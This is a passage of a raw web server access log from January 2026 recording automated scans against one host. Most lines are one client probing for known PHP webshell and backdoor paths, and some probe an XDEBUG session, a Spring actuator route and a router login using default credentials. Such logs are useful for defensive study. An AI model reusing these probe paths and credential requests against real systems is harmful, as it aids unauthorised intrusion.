"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:12:17:09 +0000] 200 - GET http 92.249.249.197 "/?XDEBUG_SESSION_START=phpstorm" [Client 79.124.40.174] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[12/Jan/2026:12:21:19 +0000] 404 - GET http localhost-nginx-proxy-manager "/boaform/admin/formLogin?username=adminisp&psd=adminisp" [Client 59.103.104.254] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:12:27:45 +0000] 404 - GET http 92.249.249.197 "/admin/config.php" [Client 91.232.238.112] [Length 150] [Gzip -] "xfa1" "-" +[12/Jan/2026:12:31:06 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:12:57:11 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:13:04:27 +0000] 405 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[12/Jan/2026:13:08:01 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:13:13:01 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:13:14:56 +0000] 400 - GET http 92.249.249.197 "/" [Client 167.94.138.32] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[12/Jan/2026:13:14:56 +0000] 400 - - http localhost "-" [Client 167.94.138.32] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:13:15:00 +0000] 400 - GET http 92.249.249.197 "/login" [Client 167.94.138.32] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[12/Jan/2026:13:21:13 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:13:32:39 +0000] 404 - GET http 92.249.249.197 "/actuator/gateway/routes" [Client 79.124.40.174] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[12/Jan/2026:13:44:04 +0000] 400 - GET http localhost-nginx-proxy-manager "/" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:13:46:12 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:13:51:50 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[12/Jan/2026:13:59:21 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:14:02:30 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/plugins/hellopress/wp_filemanager.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:30 +0000] 404 - GET http profibot.direct.quickconnect.to "/zziih.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:31 +0000] 404 - GET http profibot.direct.quickconnect.to "//meed.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:31 +0000] 404 - GET http profibot.direct.quickconnect.to "/norn.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:31 +0000] 404 - GET http profibot.direct.quickconnect.to "/undel.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:31 +0000] 404 - GET http profibot.direct.quickconnect.to "/dy.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:31 +0000] 404 - GET http profibot.direct.quickconnect.to "/hytr.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:31 +0000] 404 - GET http profibot.direct.quickconnect.to "/xs.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:31 +0000] 404 - GET http profibot.direct.quickconnect.to "/ax.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:31 +0000] 404 - GET http profibot.direct.quickconnect.to "//zziih.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:31 +0000] 404 - GET http profibot.direct.quickconnect.to "/meed.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:31 +0000] 404 - GET http profibot.direct.quickconnect.to "//norn.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:31 +0000] 404 - GET http profibot.direct.quickconnect.to "//undel.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:31 +0000] 404 - GET http profibot.direct.quickconnect.to "//dy.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:31 +0000] 404 - GET http profibot.direct.quickconnect.to "//hytr.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:31 +0000] 404 - GET http profibot.direct.quickconnect.to "//xs.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:31 +0000] 404 - GET http profibot.direct.quickconnect.to "//ax.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:31 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-admin/images/wp-conflg.php?p=" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:31 +0000] 404 - GET http profibot.direct.quickconnect.to "//assets/css/index.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:31 +0000] 404 - GET http profibot.direct.quickconnect.to "//function/function.php?p=" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:31 +0000] 404 - GET http profibot.direct.quickconnect.to "//mah/function.php?p=" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:31 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-content/admin.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:31 +0000] 404 - GET http profibot.direct.quickconnect.to "//cgi-bin/index.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:31 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-includes/css/dist/" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:31 +0000] 404 - GET http profibot.direct.quickconnect.to "//aa.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:31 +0000] 404 - GET http profibot.direct.quickconnect.to "//av.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:32 +0000] 404 - GET http profibot.direct.quickconnect.to "//adminfuns.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:32 +0000] 404 - GET http profibot.direct.quickconnect.to "//1.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:32 +0000] 404 - GET http profibot.direct.quickconnect.to "//templates/beez/index.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:32 +0000] 404 - GET http profibot.direct.quickconnect.to "//admin.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:32 +0000] 404 - GET http profibot.direct.quickconnect.to "//edit.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:32 +0000] 404 - GET http profibot.direct.quickconnect.to "//inc.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:32 +0000] 404 - GET http profibot.direct.quickconnect.to "//item.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:32 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-includes/js/dist/" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:32 +0000] 404 - GET http profibot.direct.quickconnect.to "//alfa.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:32 +0000] 404 - GET http profibot.direct.quickconnect.to "//log.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:32 +0000] 404 - GET http profibot.direct.quickconnect.to "//lock360.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:32 +0000] 404 - GET http profibot.direct.quickconnect.to "//class.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:32 +0000] 404 - GET http profibot.direct.quickconnect.to "/update/f35.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:32 +0000] 404 - GET http profibot.direct.quickconnect.to "//file/function.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:32 +0000] 404 - GET http profibot.direct.quickconnect.to "//adminfuns.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:32 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-content/wp-configs.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:32 +0000] 404 - GET http profibot.direct.quickconnect.to "//goods.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:32 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-l0gin.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:32 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/id3/admin.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:32 +0000] 404 - GET http profibot.direct.quickconnect.to "//sadd5.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:32 +0000] 404 - GET http profibot.direct.quickconnect.to "/xenium4.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:32 +0000] 404 - GET http profibot.direct.quickconnect.to "/sadd5.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:32 +0000] 404 - GET http profibot.direct.quickconnect.to "/file58.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:32 +0000] 404 - GET http profibot.direct.quickconnect.to "/f5.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:33 +0000] 404 - GET http profibot.direct.quickconnect.to "/ma.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:33 +0000] 404 - GET http profibot.direct.quickconnect.to "/s1.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:33 +0000] 404 - GET http profibot.direct.quickconnect.to "/xa.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:33 +0000] 404 - GET http profibot.direct.quickconnect.to "/f8.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:33 +0000] 404 - GET http profibot.direct.quickconnect.to "/flower2.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:33 +0000] 404 - GET http profibot.direct.quickconnect.to "/000.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:33 +0000] 404 - GET http profibot.direct.quickconnect.to "/xxxx.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:33 +0000] 404 - GET http profibot.direct.quickconnect.to "/wen.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:33 +0000] 404 - GET http profibot.direct.quickconnect.to "/ss1.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:33 +0000] 404 - GET http profibot.direct.quickconnect.to "/shoyo.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:33 +0000] 404 - GET http profibot.direct.quickconnect.to "/flower.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:33 +0000] 404 - GET http profibot.direct.quickconnect.to "/adminfuns.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:33 +0000] 404 - GET http profibot.direct.quickconnect.to "/file48.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:33 +0000] 404 - GET http profibot.direct.quickconnect.to "/info.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:33 +0000] 404 - GET http profibot.direct.quickconnect.to "/class9.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:33 +0000] 404 - GET http profibot.direct.quickconnect.to "/bless11.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:33 +0000] 404 - GET http profibot.direct.quickconnect.to "/class.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:33 +0000] 404 - GET http profibot.direct.quickconnect.to "/bless5.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:33 +0000] 404 - GET http profibot.direct.quickconnect.to "/lock360.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:33 +0000] 404 - GET http profibot.direct.quickconnect.to "/f35.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:33 +0000] 404 - GET http profibot.direct.quickconnect.to "/gg.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:33 +0000] 404 - GET http profibot.direct.quickconnect.to "/ar.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:33 +0000] 404 - GET http profibot.direct.quickconnect.to "/alfa.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:33 +0000] 404 - GET http profibot.direct.quickconnect.to "/classwithtostring.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:34 +0000] 404 - GET http profibot.direct.quickconnect.to "/abcd.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:34 +0000] 404 - GET http profibot.direct.quickconnect.to "/admin.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:34 +0000] 404 - GET http profibot.direct.quickconnect.to "/ioxi-o.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:34 +0000] 404 - GET http profibot.direct.quickconnect.to "/css.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:34 +0000] 404 - GET http profibot.direct.quickconnect.to "/222.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:34 +0000] 404 - GET http profibot.direct.quickconnect.to "/class19.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:34 +0000] 404 - GET http profibot.direct.quickconnect.to "/class20.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:34 +0000] 404 - GET http profibot.direct.quickconnect.to "/admin.php?p=" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:34 +0000] 404 - GET http profibot.direct.quickconnect.to "/css.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:34 +0000] 404 - GET http profibot.direct.quickconnect.to "/wsd.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:34 +0000] 404 - GET http profibot.direct.quickconnect.to "/gtc.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:34 +0000] 404 - GET http profibot.direct.quickconnect.to "/xtride.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:34 +0000] 404 - GET http profibot.direct.quickconnect.to "/s11.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:34 +0000] 404 - GET http profibot.direct.quickconnect.to "/goat.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:34 +0000] 404 - GET http profibot.direct.quickconnect.to "/goods.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:34 +0000] 404 - GET http profibot.direct.quickconnect.to "/f6.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:34 +0000] 404 - GET http profibot.direct.quickconnect.to "/galex.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:34 +0000] 404 - GET http profibot.direct.quickconnect.to "/inputs.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:34 +0000] 404 - GET http profibot.direct.quickconnect.to "/about.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:34 +0000] 404 - GET http profibot.direct.quickconnect.to "/pp.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:34 +0000] 404 - GET http profibot.direct.quickconnect.to "/files.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:34 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/js/wp-conflg.php?p=" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:34 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/admin.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:34 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/themes/about.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:35 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/fonts/index.php?p=" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:35 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/about.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:35 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/css/colors/blue/index.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:35 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/maint/about.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:35 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/wp-class.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:35 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/css/colors/midnight/about.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:35 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/radio.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:35 +0000] 404 - GET http profibot.direct.quickconnect.to "/ac.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:35 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-content/alfa.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:35 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-admin/css/about.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:35 +0000] 404 - GET http profibot.direct.quickconnect.to "/admin/resources/dummy/log.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:35 +0000] 404 - GET http profibot.direct.quickconnect.to "/bras.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:35 +0000] 404 - GET http profibot.direct.quickconnect.to "/xe.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:35 +0000] 404 - GET http profibot.direct.quickconnect.to "/bipas.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:35 +0000] 404 - GET http profibot.direct.quickconnect.to "/xb.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:35 +0000] 404 - GET http profibot.direct.quickconnect.to "/x.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:35 +0000] 404 - GET http profibot.direct.quickconnect.to "/xx.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:35 +0000] 404 - GET http profibot.direct.quickconnect.to "/defaul1.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:35 +0000] 404 - GET http profibot.direct.quickconnect.to "/css/license.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:35 +0000] 404 - GET http profibot.direct.quickconnect.to "/xtt.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/widgets/about.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/nov.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/xo.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/class111.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/des.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/ext.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/cache/" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/doc.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/PHPMailer/" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/blocks/code/" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/js/crop/" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/rest-api/about.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/css/colors/blue/" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/ant.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/gec.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/batmplus.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/text.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/maint/yes.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/x/" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:36 +0000] 404 - GET http profibot.direct.quickconnect.to "//mail.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/includes/class_api.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/.well-known/" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/ALFA_DATA/alfacgiapi/" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:37 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/network/" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:37 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/SimplePie/" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:37 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:37 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/Requests/Text/" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:37 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/css/colors/" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:37 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/plugins/wp-help/" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:37 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/rest-api/fields/cache/" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:37 +0000] 404 - GET http profibot.direct.quickconnect.to "/priv8.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:37 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/xl2023.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:37 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/alfa.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:37 +0000] 404 - GET http profibot.direct.quickconnect.to "//dropdown.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:37 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/Text/Diff/Engine/about.php" [Client 52.169.206.229] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:14:02:53 +0000] 400 - GET http 92.249.249.197 "/" [Client 185.242.226.107] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; 